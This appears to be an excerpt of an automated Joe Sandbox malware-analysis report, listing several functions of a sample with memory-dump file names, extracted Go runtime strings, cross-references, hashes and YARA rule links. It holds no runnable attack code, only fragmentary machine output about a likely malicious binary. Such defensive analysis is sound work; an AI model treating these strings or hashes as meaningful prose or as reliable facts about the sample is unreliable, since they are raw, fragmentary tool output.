                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: , newval=, oldval=, size = , tail = -07:00:00244140625: status=AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticExceptionFindCloseGlobalPtrHex_DigitInheritedInterfaceKhudawadiLocalFreeMalayalamMemberRefMethodDefMethodPtrModuleRefMongolianMoveFileWNabataea$, oldval=, size = , tail = -07:00:00244140625: status=AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticExceptionFindCloseGlobalPtrHex_DigitInheritedInterfaceKhudawadiLocalFreeMalayalamMemberRefMethodDefMethodPtrModuleRefMongolianMoveFileWNabataeanPalmyren$7$casfrom_Gscanstatus: gp->status is not in scan state : message too long for RSA public key sizeencountered an error while unpacking image CHPE Metaerrors: *target must be interface or implement errormallocgc called without a P or outside bootstrapping$casfrom_Gscanstatus:top gp->status is not in scan stategentraceback callback cannot be used with non-zero skipinvalid NT Header Offset. NT Header Signature not foundos: invalid use of WriteAt on file opened with O_APPEND : internal error: invalid use of $runtime: casfrom_Gscanstatus bad oldval gp=runtime: heapBitsSetTypeGCProg: total bits runtime: releaseSudog with non-nil gp.paramruntime:stoplockedm: lockedg (atomicstatus=transform: inconsistent byte count returnedunfinished open-coded defers in deferreturnun$runtime: casfrom_Gscanstatus failed gp=stack growth not allowed in system callsuspendG from non-preemptible goroutinetags don't match (%d vs %+v) %+v %s @%dtraceback: unexpected SPWRITE function transport endpoint is already connectedx509: failed to parse URI
                                                                                • API String ID: 0-3095482781
                                                                                • Opcode ID: bb6ac46058c1ae61cda93bdccfb7480c982d3bb19a5b700239d41e9bb59c5fe3
                                                                                • Instruction ID: a14314033f239407d17d08589c5fafc3d22358260ed4ec0b8c5ef2d61fbca687
                                                                                • Opcode Fuzzy Hash: bb6ac46058c1ae61cda93bdccfb7480c982d3bb19a5b700239d41e9bb59c5fe3
                                                                                • Instruction Fuzzy Hash: B741C6B4908B858FC700FF75E29575EBBE4AF84748F908C6DE4C887352E77499488B62
                                                                                Function 00AE5600 Relevance: 7.7, Strings: 6, Instructions: 151COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • e+, xrefs: 00AE579E
                                                                                • +Inf-Inf.bat.cmd.com.crt.exe3125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomAtoiCESTCOFFChamDashEESTFileGOGCINFOJulyJuneLEAFLTCGLisuMiaoMiscModiNB10NZDTNZSTNewaPOGORSDSSASTStatThaiTrapWARNXBOXm=] = ] n=allgallpasn1avx2basebindbmi1bmi2boolcallcas1cas2cas3cas4cas5cas6, xrefs: 00AE5670
                                                                                • -Inf.bat.cmd.com.crt.exe3125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomAtoiCESTCOFFChamDashEESTFileGOGCINFOJulyJuneLEAFLTCGLisuMiaoMiscModiNB10NZDTNZSTNewaPOGORSDSSASTStatThaiTrapWARNXBOXm=] = ] n=allgallpasn1avx2basebindbmi1bmi2boolcallcas1cas2cas3cas4cas5cas6chan, xrefs: 00AE5656
                                                                                • -, xrefs: 00AE56DA
                                                                                • ., xrefs: 00AE5799
                                                                                • -, xrefs: 00AE57A9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: +Inf-Inf.bat.cmd.com.crt.exe3125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomAtoiCESTCOFFChamDashEESTFileGOGCINFOJulyJuneLEAFLTCGLisuMiaoMiscModiNB10NZDTNZSTNewaPOGORSDSSASTStatThaiTrapWARNXBOXm=] = ] n=allgallpasn1avx2basebindbmi1bmi2boolcallcas1cas2cas3cas4cas5cas6$-$-$-Inf.bat.cmd.com.crt.exe3125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomAtoiCESTCOFFChamDashEESTFileGOGCINFOJulyJuneLEAFLTCGLisuMiaoMiscModiNB10NZDTNZSTNewaPOGORSDSSASTStatThaiTrapWARNXBOXm=] = ] n=allgallpasn1avx2basebindbmi1bmi2boolcallcas1cas2cas3cas4cas5cas6chan$.$e+
                                                                                • API String ID: 0-1812657216
                                                                                • Opcode ID: 7129ce8d4527f072217785f5264bc81c2d50711049ab8a77c619745ea94eb350
                                                                                • Instruction ID: b60946e58b6ebf9c9cba33952dad0aeca0798954ad6d7a4cc58acb4231b57b70
                                                                                • Opcode Fuzzy Hash: 7129ce8d4527f072217785f5264bc81c2d50711049ab8a77c619745ea94eb350
                                                                                • Instruction Fuzzy Hash: 88512D71C09FC08FC70BEF3AE05532A77956FA2388F848B5EE48766192E77045598643
                                                                                Function 00B06980 Relevance: 7.6, Strings: 6, Instructions: 122COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • types value=abortedconnectconsolecpuproffloat32float64forcegcgctracehead = invalidminpc= pacer: panic: readdirrunningserial:signal syscalluintptrunknownwaiting bytes, etypes is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= pointer stack=[ st, xrefs: 00B06AFA
                                                                                • runtime: textOff runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spanthread exhaustionunknown caller pcunknown type kindwait for GC cyclewine_get_version, xrefs: 00B06A42
                                                                                • not in ranges: untyped locals , not a function0123456789ABCDEF0123456789abcdef2384185791015625: value of type AddDllDirectory, xrefs: 00B06A97
                                                                                • runtime: text offset base pointer out of rangeruntime: type offset base pointer out of rangesignal arrived during external code executionslice bounds out of range [:%x] with length %ystopTheWorld: not stopped (status != _Pgcstop)sysGrow bounds not aligned to , xrefs: 00B06B6A
                                                                                • base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util(...), i = , not .reloc390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticENCLogENCMapExpectExportFlags=FormatFridayGOROOTGetACPGothicHangulHatranHebrewHy, xrefs: 00B06A6D
                                                                                • ., xrefs: 00B06B73
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: types value=abortedconnectconsolecpuproffloat32float64forcegcgctracehead = invalidminpc= pacer: panic: readdirrunningserial:signal syscalluintptrunknownwaiting bytes, etypes is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= pointer stack=[ st$ base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util(...), i = , not .reloc390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticENCLogENCMapExpectExportFlags=FormatFridayGOROOTGetACPGothicHangulHatranHebrewHy$ not in ranges: untyped locals , not a function0123456789ABCDEF0123456789abcdef2384185791015625: value of type AddDllDirectory$.$runtime: text offset base pointer out of rangeruntime: type offset base pointer out of rangesignal arrived during external code executionslice bounds out of range [:%x] with length %ystopTheWorld: not stopped (status != _Pgcstop)sysGrow bounds not aligned to $runtime: textOff runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spanthread exhaustionunknown caller pcunknown type kindwait for GC cyclewine_get_version
                                                                                • API String ID: 0-977601121
                                                                                • Opcode ID: acc290f7a56ba3e6748ccf2f59790e4f724ae8c414854787f78069b2533c6729
                                                                                • Instruction ID: 47cd1a00145646704910d37c5bad75b94da9edc9f3593d36161d28d6ba42b43f
                                                                                • Opcode Fuzzy Hash: acc290f7a56ba3e6748ccf2f59790e4f724ae8c414854787f78069b2533c6729
                                                                                • Instruction Fuzzy Hash: 7451F1B4908745CFC304EF35D18566ABBE0FB88308F40896DE89997392E774D989DB52
                                                                                Function 00AC3940 Relevance: 7.6, Strings: 6, Instructions: 104COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • runtime: found obj at *(runtime: markroot index runtime: p.searchAddr = span has no free objectsstack trace unavailablestructure needs cleaningx509: malformed validityzlib: invalid dictionary{%06X-%04X-%04X-%04X-%X} bytes failed with errno= to unused region o, xrefs: 00AC3A1F
                                                                                • +,-./05:;<=?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03, xrefs: 00AC3A49
                                                                                • checkmark found unmarked objectcoff symbols parsing failed: %ventersyscallblock inconsistent fmt: unknown base; can't happeninternal error - misuse of itabinvalid network interface indexmalformed time zone informationnon in-use span in unswept listpacer: sweep, xrefs: 00AC3AF1
                                                                                • runtime: checkmarks found unexpected unmarked object obj=pkcs7: Message digest mismatchExpected: %XActual : %Xthe optional header exceeds the file length (%d + %d > %d)ber2der: Indefinite form tag must have constructed encodingbufio.Scanner: SplitFunc ret, xrefs: 00AC39E6
                                                                                • 9, xrefs: 00AC39EF
                                                                                • basebindbmi1bmi2boolcallcas1cas2cas3cas4cas5cas6chandeadermsfileftpsfunchourhttpicmpidleigmpint8itabkindopenpathpipepop3profquitreadrecvrootsbrkseeksendsmtpsse3tag:tcp4trueudp4uint -%s ... BOM) MB, and max= ms, ptr tab= top=+0330+0430+0530+0545+0630+0845, xrefs: 00AC3A8E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: +,-./05:;<=?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03$9$basebindbmi1bmi2boolcallcas1cas2cas3cas4cas5cas6chandeadermsfileftpsfunchourhttpicmpidleigmpint8itabkindopenpathpipepop3profquitreadrecvrootsbrkseeksendsmtpsse3tag:tcp4trueudp4uint -%s ... BOM) MB, and max= ms, ptr tab= top=+0330+0430+0530+0545+0630+0845$checkmark found unmarked objectcoff symbols parsing failed: %ventersyscallblock inconsistent fmt: unknown base; can't happeninternal error - misuse of itabinvalid network interface indexmalformed time zone informationnon in-use span in unswept listpacer: sweep$runtime: checkmarks found unexpected unmarked object obj=pkcs7: Message digest mismatchExpected: %XActual : %Xthe optional header exceeds the file length (%d + %d > %d)ber2der: Indefinite form tag must have constructed encodingbufio.Scanner: SplitFunc ret$runtime: found obj at *(runtime: markroot index runtime: p.searchAddr = span has no free objectsstack trace unavailablestructure needs cleaningx509: malformed validityzlib: invalid dictionary{%06X-%04X-%04X-%04X-%X} bytes failed with errno= to unused region o
                                                                                • API String ID: 0-3099054432
                                                                                • Opcode ID: 9bcb8d98a66a7be1d5bc0ae2fb5dea9845a503c43661e0c16a507ec8e5782e2a
                                                                                • Instruction ID: ea55d2125def079895b4fed325a834c87ad781e3b96c3ca5507b11b3832c2675
                                                                                • Opcode Fuzzy Hash: 9bcb8d98a66a7be1d5bc0ae2fb5dea9845a503c43661e0c16a507ec8e5782e2a
                                                                                • Instruction Fuzzy Hash: 5B410CB4509B809FC300EF29D29575EBBE0BF85708F85896DE8C88B352D774D905CB62
                                                                                Function 00AECE10 Relevance: 7.6, Strings: 6, Instructions: 101COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • runtime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextptoo many Additionals to pack (>65535)too many Authorities to pack (>65535)value too large for defined data typex509: RSA key missing NULL parametersx, xrefs: 00AECF22
                                                                                • bad g statusbad g0 stackbad recoverycan't happencas64 failedchan receivedumping heapend tracegcentersyscallexit status freeaddrinfogcBitsArenasgcpacertraceharddecommithost is downillegal seekinvalid baseinvalid slotiphlpapi.dllkernel32.dllmadvdontneedmheapSpe, xrefs: 00AECF9F
                                                                                • in async preempt to non-Go memory , locked to thread2980232238769531254e45544672616d6577: day out of rangeArab Standard TimeBSTR_UserUnmarshalCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWCloseServiceHandleCommandLineToArgvWCreateDispTypeInfoCreateFi, xrefs: 00AECF4C
                                                                                • preempt at unknown pcread-only file system releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NF, xrefs: 00AECF7D
                                                                                • preempt SPWRITErecovery failed lite.Setruntime error: runtime: frame runtime: max = runtime: min = runtimer: bad pscan missed a gstartm: m has pstopm holding punknown Go type already; errno= mheap.sweepgen= not in ranges: untyped locals ,, xrefs: 00AECF67
                                                                                • %, xrefs: 00AECF2B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: in async preempt to non-Go memory , locked to thread2980232238769531254e45544672616d6577: day out of rangeArab Standard TimeBSTR_UserUnmarshalCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWCloseServiceHandleCommandLineToArgvWCreateDispTypeInfoCreateFi$%$bad g statusbad g0 stackbad recoverycan't happencas64 failedchan receivedumping heapend tracegcentersyscallexit status freeaddrinfogcBitsArenasgcpacertraceharddecommithost is downillegal seekinvalid baseinvalid slotiphlpapi.dllkernel32.dllmadvdontneedmheapSpe$preempt SPWRITErecovery failed lite.Setruntime error: runtime: frame runtime: max = runtime: min = runtimer: bad pscan missed a gstartm: m has pstopm holding punknown Go type already; errno= mheap.sweepgen= not in ranges: untyped locals ,$preempt at unknown pcread-only file system releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NF$runtime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextptoo many Additionals to pack (>65535)too many Authorities to pack (>65535)value too large for defined data typex509: RSA key missing NULL parametersx
                                                                                • API String ID: 0-428031113
                                                                                • Opcode ID: d1d14a554bf3c51eee8891d7f3d557e5a73c9bb98773e54a7c2ce61cd14a15e5
                                                                                • Instruction ID: 99098714261c36406f8610ab9c3e949676cf0538af45830d7db2151cd9f1d601
                                                                                • Opcode Fuzzy Hash: d1d14a554bf3c51eee8891d7f3d557e5a73c9bb98773e54a7c2ce61cd14a15e5
                                                                                • Instruction Fuzzy Hash: D44106B45087848FC304EF69D295B6EBBE1AF89704F01886DF8D88B352D775D849DB22
                                                                                Function 00ADCCC0 Relevance: 7.6, Strings: 6, Instructions: 89COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • fully empty unfreed span set block found in resetinvalid memory address or nil pointer dereferenceinvalid or incomplete multibyte or wide characternot enough significant bits after mult128bitPow10panicwrap: unexpected string after package name: , xrefs: 00ADCD91
                                                                                • head = invalidminpc= pacer: panic: readdirrunningserial:signal syscalluintptrunknownwaiting bytes, etypes is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= pointer stack=[ status %!Month(2.5.4.102.5.4.112.5.4.1748828125AcceptExArmenianAssemblyB, xrefs: 00ADCDCA
                                                                                • span set block with unpopped elements found in resetx509: cannot verify signature: insecure algorithm %vcompileCallback: argument size is larger than uintptr : string slice index out of bounds : non-interface type passed to Type.Impleme, xrefs: 00ADCDA7
                                                                                • , tail = -07:00:00244140625: status=AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticExceptionFindCloseGlobalPtrHex_DigitInheritedInterfaceKhudawadiLocalFreeMalayalamMemberRefMethodDefMethodPtrModuleRefMongolianMoveFileWNabataeanPalmyreneParseUintRegister, xrefs: 00ADCDF4
                                                                                • #, xrefs: 00ADCE31
                                                                                • attempt to clear non-empty span setber2der: BER tag length is negativeencoding/hex: odd length hex stringexecutable file not found in %PATH%file type does not support deadlinefindrunnable: netpoll with spinninggreyobject: obj not pointer-alignedmheap.freeSpanL, xrefs: 00ADCE28
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
